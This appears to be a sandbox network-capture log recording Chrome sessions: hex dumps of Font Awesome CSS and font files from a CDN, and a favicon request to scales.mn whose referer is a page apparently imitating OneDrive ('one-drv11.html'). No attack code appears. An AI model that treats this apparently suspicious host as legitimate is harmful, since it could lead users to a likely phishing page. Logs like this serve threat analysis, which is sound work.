2025-01-06 18:23:09 UTC	1369	IN	Data Raw: 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 36 39 22 7d 2e 66 61 2d 61 63 71 75 69 73 69 74 69 6f 6e 73 2d 69 6e 63 6f 72 70 6f 72 61 74 65 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 61 66 22 7d 2e 66 61 2d 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 34 31 22 7d 2e 66 61 2d 61 64 64 72 65 73 73 2d 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 62 39 22 7d 2e 66 61 2d 61 64 64 72 65 73 73 2d 63 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 62 62 22 7d 2e 66 61 2d 61 64 6a 75 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 32 22 7d 2e 66 61 2d 61 64 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 37 30 22 7d 2e 66 61 2d 61 Data Ascii: efore{content:"\f369"}.fa-acquisitions-incorporated:before{content:"\f6af"}.fa-ad:before{content:"\f641"}.fa-address-book:before{content:"\f2b9"}.fa-address-card:before{content:"\f2bb"}.fa-adjust:before{content:"\f042"}.fa-adn:before{content:"\f170"}.fa-a
2025-01-06 18:23:09 UTC	1369	IN	Data Raw: 6e 74 65 6e 74 3a 22 5c 66 33 36 65 22 7d 2e 66 61 2d 61 6e 67 75 6c 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 32 30 22 7d 2e 66 61 2d 61 6e 6b 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 34 34 22 7d 2e 66 61 2d 61 70 70 2d 73 74 6f 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 36 66 22 7d 2e 66 61 2d 61 70 70 2d 73 74 6f 72 65 2d 69 6f 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 37 30 22 7d 2e 66 61 2d 61 70 70 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 37 31 22 7d 2e 66 61 2d 61 70 70 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 37 39 22 7d 2e 66 61 2d 61 70 70 6c 65 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 Data Ascii: ntent:"\f36e"}.fa-angular:before{content:"\f420"}.fa-ankh:before{content:"\f644"}.fa-app-store:before{content:"\f36f"}.fa-app-store-ios:before{content:"\f370"}.fa-apper:before{content:"\f371"}.fa-apple:before{content:"\f179"}.fa-apple-alt:before{content:"
2025-01-06 18:23:09 UTC	1369	IN	Data Raw: 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 39 65 22 7d 2e 66 61 2d 61 75 74 6f 70 72 65 66 69 78 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 31 63 22 7d 2e 66 61 2d 61 76 69 61 6e 65 78 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 37 34 22 7d 2e 66 61 2d 61 76 69 61 74 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 32 31 22 7d 2e 66 61 2d 61 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 35 39 22 7d 2e 66 61 2d 61 77 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 37 35 22 7d 2e 66 61 2d 62 61 62 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 37 63 22 7d 2e 66 61 2d 62 61 62 79 2d 63 61 72 72 69 61 67 65 3a 62 65 66 6f 72 65 7b 63 6f 6e Data Ascii: efore{content:"\f29e"}.fa-autoprefixer:before{content:"\f41c"}.fa-avianex:before{content:"\f374"}.fa-aviato:before{content:"\f421"}.fa-award:before{content:"\f559"}.fa-aws:before{content:"\f375"}.fa-baby:before{content:"\f77c"}.fa-baby-carriage:before{con
2025-01-06 18:23:09 UTC	1369	IN	Data Raw: 69 65 72 2d 63 75 72 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 35 62 22 7d 2e 66 61 2d 62 69 62 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 34 37 22 7d 2e 66 61 2d 62 69 63 79 63 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 30 36 22 7d 2e 66 61 2d 62 69 6b 69 6e 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 38 34 61 22 7d 2e 66 61 2d 62 69 6d 6f 62 6a 65 63 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 37 38 22 7d 2e 66 61 2d 62 69 6e 6f 63 75 6c 61 72 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 65 35 22 7d 2e 66 61 2d 62 69 6f 68 61 7a 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 38 30 22 7d 2e 66 61 2d 62 69 72 74 Data Ascii: ier-curve:before{content:"\f55b"}.fa-bible:before{content:"\f647"}.fa-bicycle:before{content:"\f206"}.fa-biking:before{content:"\f84a"}.fa-bimobject:before{content:"\f378"}.fa-binoculars:before{content:"\f1e5"}.fa-biohazard:before{content:"\f780"}.fa-birt
2025-01-06 18:23:09 UTC	1369	IN	Data Raw: 2d 6f 70 65 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 39 65 22 7d 2e 66 61 2d 62 6f 78 2d 74 69 73 73 75 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 35 62 22 7d 2e 66 61 2d 62 6f 78 65 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 36 38 22 7d 2e 66 61 2d 62 72 61 69 6c 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 61 31 22 7d 2e 66 61 2d 62 72 61 69 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 64 63 22 7d 2e 66 61 2d 62 72 65 61 64 2d 73 6c 69 63 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 65 63 22 7d 2e 66 61 2d 62 72 69 65 66 63 61 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 62 31 22 7d 2e 66 61 2d 62 72 69 65 66 63 61 Data Ascii: -open:before{content:"\f49e"}.fa-box-tissue:before{content:"\e05b"}.fa-boxes:before{content:"\f468"}.fa-braille:before{content:"\f2a1"}.fa-brain:before{content:"\f5dc"}.fa-bread-slice:before{content:"\f7ec"}.fa-briefcase:before{content:"\f0b1"}.fa-briefca
2025-01-06 18:23:09 UTC	1369	IN	Data Raw: 6e 74 65 6e 74 3a 22 5c 66 37 38 35 22 7d 2e 66 61 2d 63 61 6e 64 79 2d 63 61 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 38 36 22 7d 2e 66 61 2d 63 61 6e 6e 61 62 69 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 35 66 22 7d 2e 66 61 2d 63 61 70 73 75 6c 65 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 36 62 22 7d 2e 66 61 2d 63 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 62 39 22 7d 2e 66 61 2d 63 61 72 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 64 65 22 7d 2e 66 61 2d 63 61 72 2d 62 61 74 74 65 72 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 64 66 22 7d 2e 66 61 2d 63 61 72 2d 63 72 61 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 Data Ascii: ntent:"\f785"}.fa-candy-cane:before{content:"\f786"}.fa-cannabis:before{content:"\f55f"}.fa-capsules:before{content:"\f46b"}.fa-car:before{content:"\f1b9"}.fa-car-alt:before{content:"\f5de"}.fa-car-battery:before{content:"\f5df"}.fa-car-crash:before{conte
2025-01-06 18:23:09 UTC	1369	IN	Data Raw: 3a 22 5c 66 36 63 30 22 7d 2e 66 61 2d 63 68 61 6c 6b 62 6f 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 31 62 22 7d 2e 66 61 2d 63 68 61 6c 6b 62 6f 61 72 64 2d 74 65 61 63 68 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 31 63 22 7d 2e 66 61 2d 63 68 61 72 67 69 6e 67 2d 73 74 61 74 69 6f 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 65 37 22 7d 2e 66 61 2d 63 68 61 72 74 2d 61 72 65 61 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 66 65 22 7d 2e 66 61 2d 63 68 61 72 74 2d 62 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 38 30 22 7d 2e 66 61 2d 63 68 61 72 74 2d 6c 69 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 30 31 22 7d 2e 66 61 2d 63 Data Ascii: :"\f6c0"}.fa-chalkboard:before{content:"\f51b"}.fa-chalkboard-teacher:before{content:"\f51c"}.fa-charging-station:before{content:"\f5e7"}.fa-chart-area:before{content:"\f1fe"}.fa-chart-bar:before{content:"\f080"}.fa-chart-line:before{content:"\f201"}.fa-c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49746	104.17.25.14	443	3484	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 18:23:10 UTC	648	OUT	GET /ajax/libs/font-awesome/5.15.3/webfonts/fa-solid-900.woff2 HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://scales.mn sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: font Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-06 18:23:10 UTC	969	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 18:23:10 GMT Content-Type: application/octet-stream; charset=utf-8 Content-Length: 78196 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: "6599bdc3-13174" Last-Modified: Sat, 06 Jan 2024 21:53:23 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 71147 Expires: Sat, 27 Dec 2025 18:23:10 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X6kaXt5WUTXRQT0yCeRVnG2i1JGCZMaLBRVN89GZL25ViVM6Tqd8CsedW5bVonfwALeMNsDuPKsqMdWlVRatIQCaL6vKYn6fvnikVu47MdIuhQAHavpTK9l4ezdVZ6xOPePvKbOU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 8fddbcda592c7cab-EWR alt-svc: h3=":443"; ma=86400
2025-01-06 18:23:10 UTC	400	IN	Data Raw: 77 4f 46 32 00 01 00 00 00 01 31 74 00 0d 00 00 00 03 17 f4 00 01 31 1a 01 4b 85 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 1e 06 60 00 99 4e 11 08 0a 8a e6 68 88 c3 42 01 36 02 24 03 9f 30 0b 9f 34 00 04 20 05 8a 2b 07 e2 2e 5b b4 75 92 81 70 d3 28 e4 d7 9b 55 15 64 81 f0 7b 2d 98 6e ee 50 6e 1b c0 c9 9f e1 5f 3d 56 32 b6 65 04 ef 76 70 d8 7e 97 ab c8 fe ff ff ff 7f 55 b2 90 31 fd bf c0 3d 09 1f 42 c0 82 62 ad ae b2 95 6d 76 53 b4 2e c6 94 ac 77 c9 43 19 2b e8 24 99 b8 a4 28 fd a0 4d 4d 49 e6 69 48 7d aa 93 4f e5 04 eb 34 c0 37 15 73 ce 12 17 59 81 29 02 2a 02 2a 02 ca d9 dd 7d ec 95 07 5e da b4 89 bb 7b 5e a1 b7 f2 aa 52 0a 7a df d0 0a 8d 66 c8 8c 06 68 34 64 44 37 eb 3a 31 2a 9a 99 18 43 6a 83 1f 6c cd 38 4d a5 Data Ascii: wOF21t1K?FFTM`NhB6$04 +.[up(Ud{-nPn_=V2evp~U1=BbmvS.wC+$(MMIiH}O47sY)*}^{^Rzfh4dD7:1Cjl8M
2025-01-06 18:23:10 UTC	1369	IN	Data Raw: 78 95 52 92 0c 1e d0 63 b6 68 fb 86 77 a2 7f f2 3f 74 6d ec 01 6c d7 01 04 4c 51 0d c9 a0 8b 1e fa b4 68 4d 67 f6 1e c3 78 aa 0a d0 31 bb 46 96 ac af 63 55 e1 62 7c d1 33 ed f0 a4 9b ff ee 76 92 4b 72 c9 66 e6 48 20 04 10 39 20 40 18 9a 83 04 08 a3 10 20 0c c5 9a a8 10 e2 e8 27 0a 02 6a db c4 c9 a1 56 71 07 3a c0 51 c5 f1 2b ae d1 0f 9d df 8e 5f e9 1a 28 ad b3 c3 4a 97 b6 7f 85 08 7e bf df 2f 87 a6 59 3c 12 22 9e b4 9f fb a4 81 47 42 9d 17 3a a6 89 50 c4 42 fb c9 fb 37 71 fe af f7 4b d2 ad 7b cc e0 11 46 22 0d de 33 b8 d6 d2 a7 c7 36 3f 13 43 2c 8b 85 42 eb f0 50 bf 56 be 99 0d 91 8c 1c e1 43 b6 43 2a f6 ca af 5c 17 b4 a9 ea 2b 9f b8 f3 01 61 89 fe 86 58 02 7a fc f2 54 7a 64 6e 8c 50 fb 4d 14 13 09 05 6c 69 98 9f a4 6c 32 29 3b 00 21 ce 16 77 58 8b a4 78 Data Ascii: xRchw?tmlLQhMgx1FcUb\|3vKrfH 9 @ 'jVq:Q+_(J~/Y<"GB:PB7qK{F"36?C,BPVCC*\+aXzTzdnPMlil2);!wXx
2025-01-06 18:23:10 UTC	1369	IN	Data Raw: 5d c8 f3 11 86 42 ea 8d 37 0f 0f 66 5e c1 59 81 cd ca 52 d3 db 52 45 de e4 05 1b 1e 15 1e 56 72 f8 16 be 9e 00 ec e7 c9 27 b8 f3 57 d5 b0 24 29 22 09 c9 a9 ad dd c7 e7 e4 d7 77 eb 15 19 93 90 92 91 5d 58 52 b7 61 df 8c d2 f2 aa a6 5e dc e7 5b 12 32 32 95 29 55 68 8c 56 f7 70 0c 9e c5 97 f9 46 d3 18 2c 8e 40 57 df c8 ca 83 ca 17 4a b5 66 6f 9e a5 c7 ae d4 1a a9 12 ad c1 0b 9e a7 75 b8 f8 4f a0 32 b8 42 b9 ba a9 85 95 8d 23 95 29 d6 e8 8c 16 fe 73 ba dc 9e ce 68 ca af ef 37 af b0 b8 4f 45 bb 0e e1 78 4a 46 49 79 4d 4b 5f ad 68 fe 14 82 89 4d 4d cb c8 cc c6 01 02 06 01 03 8f 88 82 89 47 40 4c 4e c7 cc ca 99 27 1f 28 38 44 74 2c 42 3a 8c 58 b2 e5 08 42 c5 22 22 03 b5 f2 a0 60 60 6a cd 81 63 e7 6e bc 28 a9 6a ea 19 1a 9b 59 58 db 39 b9 1a 3e 7e b7 2c 09 25 a4 Data Ascii: ]B7f^YRREVr'W$)"w]XRa^[22)UhVpF,@WJfouO2B#)sh7OExJFIyMK_hMMG@LN'(8Dt,B:XB""``jcn(jYX9>~,%
2025-01-06 18:23:10 UTC	1369	IN	Data Raw: e8 88 ea e9 7f 1f c3 ee 00 14 4f 4c ca 65 5e 8e a8 f9 06 d6 22 59 56 1a d8 67 6f b9 2a f5 ea 99 6c 01 9c 09 23 19 d6 d4 51 a3 06 aa 65 0d ac 66 24 6a 34 c3 7c 7b 1c 0f 0a ee 54 80 b4 27 1a 8a 5f 91 f6 7a 3e e3 3b 38 e9 d8 15 bb b7 fa c7 32 db 80 7e 3e d7 46 83 b8 d5 c7 bf d6 93 3b 91 7f 76 8c 69 fa 7d fc 3c 24 aa d3 47 f0 52 83 1b 72 03 42 2b 6e 1e 30 01 61 0a cd b7 97 b8 c7 46 d9 eb 6f e1 9a 6c 13 75 f3 6d e8 a7 c1 4e 49 df 62 3e 71 39 2f 7b 38 94 ba d8 39 a7 6f eb 1d 38 d6 a5 fb 01 ce 1f f5 b7 a0 06 6e ac bd c9 c4 b4 6c 98 cc 08 b7 96 7e 32 32 b0 ee 73 83 6d 38 d7 56 fa 16 ed 96 b8 76 12 23 04 9e 0f 07 01 2c 1e 9d d8 df fa 87 86 da ab 67 6e 55 e5 1e 8f 24 6b 75 d9 2b 4d 03 97 67 2d f4 d7 79 dd b1 a0 26 8b 8f 26 46 28 13 85 17 eb 16 b1 23 93 42 63 17 65 Data Ascii: OLe^"YVgo*l#Qef$j4\|{T'_z>;82~>F;vi}<$GRrB+n0aFolumNIb>q9/{89o8nl~22sm8Vv#,gnU$ku+Mg-y&&F(#Bce
2025-01-06 18:23:10 UTC	1369	IN	Data Raw: 4c 49 da c2 02 64 21 3e b0 90 9d 39 45 5c f8 e5 10 9c 31 d7 a5 b2 a5 d1 16 dc 63 6a 63 88 b3 86 c7 4b 29 66 2d ab 4c 5b f0 70 20 96 41 1a 26 33 31 78 59 ca fa 48 16 c6 60 29 5b 05 17 f6 06 b1 12 4e 4a 3a 97 6e 63 aa 42 3f b5 5b 94 bd b5 6e 92 bf 1c 39 94 ea 9e 78 7a 9e 11 79 d0 bd d1 65 b8 75 ff a8 d4 d0 2a 48 7c 70 d8 4c 88 94 29 73 dc e5 d7 8c c7 db ed c1 54 55 6f f3 f1 54 8d aa 1e a5 90 f7 a7 92 f6 9e 55 8d 22 c9 a8 6a 3c fe 71 dd d8 7b 55 de 61 e5 59 dc a0 49 70 fe 62 65 c7 16 7b 00 6e d4 e9 d9 9a af 14 9c 21 67 d4 97 d3 1e 24 a9 ea da 52 bf a0 7e 67 f2 3a f5 3f 14 08 6a e6 22 6e e7 c5 f7 35 af 7f 67 cc bd e3 c1 ff 75 ca 5f aa 71 c0 9a 7f 06 1f 45 92 57 95 a1 2e 28 6b 7a db 54 c7 51 f5 e3 ec df c0 50 a9 a1 d6 73 19 1c 0f ab 8b 8b e9 7c 41 c3 eb 06 cb Data Ascii: LId!>9E\1cjcK)f-L[p A&31xYH`)[NJ:ncB?[n9xzyeu*H\|pL)sTUoTU"j<q{UaYIpbe{n!g$R~g:?j"n5gu_qEW.(kzTQPs\|A
2025-01-06 18:23:10 UTC	1369	IN	Data Raw: 64 eb 74 ba 65 3c f9 5e 10 dc 57 5f 9d 18 0f d1 b2 a1 f4 18 cb a4 73 1c 99 f9 b6 dd 36 c7 ce d4 52 d3 01 96 c7 48 fa 10 78 b4 06 f2 41 67 61 2a c4 8d 1e d6 3c 9a 16 54 92 21 89 4e 8f 56 96 c6 5d 19 0e 00 86 46 7d ed 10 12 34 43 1b b6 d5 e8 b4 d4 44 51 be b4 1c 2f 37 ba 46 36 83 55 10 b5 31 ca b0 78 09 f3 16 72 de 43 b8 99 dc 9a e2 3e b1 83 92 81 32 8c b2 0b 1e 69 6d 4b f8 e5 1a 21 18 1e 59 e7 07 5e 02 b7 1b a3 98 b4 ed 68 73 3c 88 1e be 8a 38 af be a0 15 84 e3 f2 3a 3c fa dc 08 08 cb 57 f2 25 80 6f 88 85 fb 04 99 35 20 74 b8 64 60 8c d1 94 31 ac a6 aa b3 ca 1f 76 d7 9a 3a 63 33 8c bd b7 3f b5 ed 18 01 b8 89 67 eb 4b 49 17 f0 5f c6 ac 92 14 80 4c 5e 26 bd bf b3 38 15 3e 5e 18 52 d7 9a 80 f7 86 a3 56 1d d1 19 c7 62 cd 72 ec 07 b0 51 1d 8b 18 c7 07 4c 60 4e Data Ascii: dte<^W_s6RHxAga*<T!NV]F}4CDQ/7F6U1xrC>2imK!Y^hs<8:<W%o5 td`1v:c3?gKI_L^&8>^RVbrQL`N
2025-01-06 18:23:10 UTC	1369	IN	Data Raw: 36 49 e2 02 fe b9 55 08 4f 44 d7 92 8d 82 0c 69 a1 3f ed de 37 64 ff 4a ce d0 0a f7 41 4d a7 74 83 0e 42 5f dd b3 e6 66 86 94 91 44 3a 84 43 5d 83 d2 98 26 85 1c d4 7a 14 f5 47 4d d8 24 db c0 32 cd e6 fa 52 d2 3a b5 e6 44 c5 c9 c1 39 d3 3f 1d aa af 7d 5a 55 fd b5 90 b7 66 fb 4b c6 33 be 3c 46 a9 ca 36 2a a9 c5 69 ce 16 b1 3a bf 7c c5 dc 90 0d fe 89 82 95 13 b5 42 57 7c 9f fa 0b 17 3b 27 23 fe dc 6f 43 52 3d 2d 1a 41 97 8e 54 75 ce 4e da 0f 92 e7 85 42 eb b3 0d a5 a2 17 c6 c8 10 80 31 32 50 44 82 bd fc 50 8d 98 21 c2 1f 36 dd 75 f5 27 2b e3 1e 7f 49 34 a8 06 59 b9 94 38 15 c9 00 59 7a 8c 89 19 8e e0 7f 97 34 c5 6c ab 44 0b 9d a2 27 81 9b 0c 04 2b 8f 45 26 4f 00 b0 9b 1d 53 92 57 33 99 9a 23 24 29 a8 89 11 b0 5c c4 d5 c6 9b f4 a2 3b a5 28 c6 12 3c d5 c1 1c Data Ascii: 6IUODi?7dJAMtB_fD:C]&zGM$2R:D9?}ZUfK3<F6*i:\|BW\|;'#oCR=-ATuNB12PDP!6u'+I4Y8Yz4lD'+E&OSW3#$)\;(<
2025-01-06 18:23:10 UTC	1369	IN	Data Raw: 2b 7c 2a 92 b6 4e 29 0b 53 67 14 dd 66 64 a0 e3 95 ad b1 63 d0 32 fe f2 47 e7 97 e1 4a 7d 21 79 c6 d2 b5 0a 33 2a 3f 42 8c b1 4b f0 c0 9f c6 1e 62 62 0b 46 22 86 79 c8 a2 54 92 b5 07 b6 e1 e1 3c cf 85 f0 0b ee 59 9e c9 48 ca 9d d0 77 c9 bc 64 5e d6 f9 cb e7 18 80 07 18 32 66 a6 38 a1 01 a0 ff cc cd 65 ce 7d fc d5 dc ed f5 74 fe e6 8a d2 9b 4b 19 a7 78 2e 54 94 95 e4 c2 f2 51 e1 63 5c 29 05 b2 7c 31 9d c9 f7 67 32 7d f9 8c 35 27 b3 8d 76 5e 95 40 ac 1d 01 0f 65 b9 d8 5c 60 0b 92 29 f7 98 8a bd be b9 7b b3 50 5c b9 72 e7 f6 d2 a5 70 cf 15 57 b7 3e 4b 61 1f dc c5 92 f0 bd 99 22 b8 44 e7 df a2 c6 6b b9 cd 96 43 f1 77 0e 18 fb 9c 83 7e 66 e9 1b f7 ba 0a b4 a1 c8 6e 35 0d 56 d1 c1 e4 41 83 69 b4 d9 41 33 b7 5a 3f db fe 9e 31 02 8f c2 76 67 08 bc 02 0c 60 ce 64 Data Ascii: +\|N)Sgfdc2GJ}!y3?BKbbF"yT<YHwd^2f8e}tKx.TQc\)\|1g2}5'v^@e\`){P\rpW>Ka"DkCw~fn5VAiA3Z?1vg`d
2025-01-06 18:23:10 UTC	1369	IN	Data Raw: cb b2 1a ae 5c 27 4b 87 18 9a 2c e1 8f 61 ef ac 8c 7d 2d 79 59 cc b3 86 05 0c 6d 0f 51 de 58 01 3b 23 3c a7 e0 ee 71 f9 80 f6 c1 64 6e 3b b5 49 64 e4 f3 78 bc 77 b6 d2 82 fa 78 3d 42 9f 22 ac 98 af 9a 6e 5d 5e 7e e7 f2 b9 68 73 dd ff 9e ef 10 1d f5 eb 17 3f f9 34 c7 7d 01 cf f0 e1 36 c3 e0 d7 14 d6 ad 94 34 22 ba 9b 16 cd 6e bb 1a ae 09 70 49 66 bb 9b 4e f1 d8 91 7f 33 d1 f7 fd 08 48 42 a4 89 79 5a ad e5 10 70 fd b1 e7 0c 61 3c f1 7a ed fa 3c e0 dc f6 3e 1d 0d 08 5e 3c f3 dc 78 1d 46 c8 28 4a c8 94 68 17 8e 30 f0 d1 ae ad bd 6a 0c 8a 15 65 a9 57 65 9e 4b 06 39 b5 65 39 27 9f 0e 84 b2 34 9a dc 2e 6b 04 e1 97 bc 49 95 bd 3b 28 a7 70 e6 05 d1 2c 31 8f b3 26 91 1e 23 85 72 79 1f 8d f5 6b 2f ca 81 b8 2a 3d c7 5a 17 1a 94 f4 88 1c 4d fb 34 51 d3 54 05 ec 32 78 Data Ascii: \'K,a}-yYmQX;#<qdn;Idxwx=B"n]^~hs?4}64"npIfN3HByZpa<z<>^<xF(Jh0jeWeK9e9'4.kI;(p,1&#ryk/*=ZM4QT2x
2025-01-06 18:23:10 UTC	1369	IN	Data Raw: 7c c2 90 d0 42 c2 8e 0e 42 45 76 ac 8b 60 56 46 df 7a 93 fc 1d 2a 1f bd 31 65 58 97 a3 e8 b8 45 98 60 44 60 c7 ce c9 16 86 b1 9d 67 1a 74 eb 8b c3 cf 0d 00 f3 f5 35 fb 82 49 61 68 a6 16 09 98 c1 57 5f de f0 6a 5d 8f b9 81 59 8c 4a f2 47 5f 88 b5 43 85 5d 5a a5 1f 06 c8 92 42 67 1e 6d 62 3e 33 16 cf dd cd af c9 83 43 9c e7 89 7e 34 85 cc 83 03 9c d0 ac d4 c3 be cf 44 5e ea e9 d0 04 01 50 20 d2 65 4b 74 30 cf b7 70 5e 2e 24 2c e4 0d fa e4 f4 f8 42 34 35 fd d1 4e 41 72 75 5e e8 33 03 30 90 eb e7 e8 ea fd 99 c7 89 23 93 b6 13 20 18 01 4c 2a d2 6b f2 58 42 6b a5 dd 65 1e 0e f7 09 69 c2 6f c3 89 e3 7b 99 1c c4 37 c8 91 f0 22 d9 31 23 0d 89 53 ac 3a 47 09 c2 5b f8 90 e5 79 23 16 56 7d 26 82 1e 3a c8 24 8d 94 b4 d3 1d b0 b0 3a 9e c1 d7 cb d1 4a 50 79 7a 42 a6 e9 Data Ascii: \|BBEv`VFz1eXE`D`gt5IahW_j]YJG_C]ZBgmb>3C~4D^P eKt0p^.$,B45NAru^30# LkXBkeio{7"1#S:G[y#V}&:$:JPyzB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	43.231.112.47	443	3484	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 18:23:10 UTC	593	OUT	GET /favicon.ico HTTP/1.1 Host: scales.mn Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://scales.mn/file/one-drv11.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-06 18:23:11 UTC	176	IN	HTTP/1.1 500 Internal Server Error Date: Mon, 06 Jan 2025 18:23:10 GMT Server: Apache Content-Length: 663 Connection: close Content-Type: text/html; charset=iso-8859-1
